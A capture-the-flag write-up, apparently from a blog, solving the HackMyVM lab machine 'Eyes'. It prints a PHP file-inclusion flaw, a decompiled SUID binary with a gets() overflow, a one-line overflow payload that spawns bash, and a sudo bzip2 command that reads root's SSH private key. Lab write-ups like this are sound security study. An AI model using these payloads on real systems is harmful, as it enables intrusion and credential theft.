HMV Eyes summary

2026-04-19 2026-04-19199 Words

This machine leaks web source code by FTP service, which exposes an LFI vulnerability that could lead to RCE. Then a buffer overflow vulnerability of a SUID program let me lateral to a normal user which misconfigure a sudo rule to elevate to root permission.

Scope

  • Name:Eyes
  • Difficulty: (3/10)
  • OS: Linux
  • IP: eyes.hmv (192.168.56.140)

Enumeration

The anonymous enabled for FTP service by scanning with nmap. 

21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             125 Apr 04  2021 index.php

After download that file I realize there's an LFI vulnerability. 

<?php
$file = $_GET['fil3'];
if(isset($file))
{
include($file);
}
else
{
print("Here my eyes...");
}
?>
<!--Monica's eyes-->

This LFI vulnerability could lead to RCE by Hacktricks report. Then I obtain the initial foothold on the system.

Privilege Escalation

Buffer Overflow

I quickly find a SUID program which has a buffer overflow vulnerability there. 

www-data@eyes:~/html$ find / -mount -perm -u=s 2>/dev/null
/opt/ls
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/umount
/usr/bin/chsh

The /opt/ls program with SUID bit set catch my eyes. 

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+0h] [rbp-F0h] BYREF
  char src[12]; // [rsp+40h] [rbp-B0h] BYREF
  int v6; // [rsp+4Ch] [rbp-A4h]
  __int64 v7; // [rsp+50h] [rbp-A0h]
  __int64 v8; // [rsp+58h] [rbp-98h]
  __int64 v9; // [rsp+60h] [rbp-90h]
  __int64 v10; // [rsp+68h] [rbp-88h]
  __int16 v11; // [rsp+70h] [rbp-80h]
  char dest[112]; // [rsp+80h] [rbp-70h] BYREF

  strcpy(src, "/usr/bin/ls");
  v6 = 0;
  v7 = 0;
  v8 = 0;
  v9 = 0;
  v10 = 0;
  v11 = 0;
  printf("Enter your name:");
  gets(v4, argv); (gets)
  strcpy(dest, src);
  setuid(1000u);
  setgid(1000u);
  printf("Hi %s, Im executing ls\n Output:\n", v4);
  system(dest);
  return 0;
}

I realize there's a buffer overflow vulnerability when I notice that gets call. 

gets() reads a line from stdin into the buffer pointed to by s until either a terminating new‐
line  or  EOF, which it replaces with a null byte ('\0').

This manual of gets tell me the terminating new-line will be replaced with '\0', So I could directly overflow the dest(which is command that executed by system). The offset is 64! 

python -c "print('A'*64 + 'bash')" # payload

Monica -> root

After lateral to a normal user(uid=1000), I quickly discover a misconfigured sudo rule with bzip2. Refer this GTFOBins. I try to read out the private key of root. Yeah, it exists there! 

monica@eyes:~$ sudo /usr/bin/bzip2 -c /root/.ssh/id_rsa | bzip2 -d
Creator: Emacs 31.0.50 (Org mode 10.0-pre)